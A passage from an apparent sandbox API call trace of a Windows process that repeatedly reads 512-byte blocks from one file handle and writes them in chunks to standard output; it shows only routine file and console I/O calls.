lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.914] GetFileType (hFile=0x4c) returned 0x1 [0092.914] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.915] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.915] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] GetFileType (hFile=0x4c) returned 0x1 [0092.915] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.915] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.916] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.916] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.916] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.916] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.917] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.917] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] GetFileType (hFile=0x4c) returned 0x1 [0092.917] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.917] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.918] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] GetFileType (hFile=0x4c) returned 0x1 [0092.918] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.918] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.918] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.918] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.919] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] GetFileType (hFile=0x4c) returned 0x1 [0092.919] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.919] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.919] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.919] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.920] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] GetFileType (hFile=0x4c) returned 0x1 [0092.920] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.920] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.920] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.920] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.920] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType (hFile=0x4c) returned 0x1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.921] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.921] GetFileType 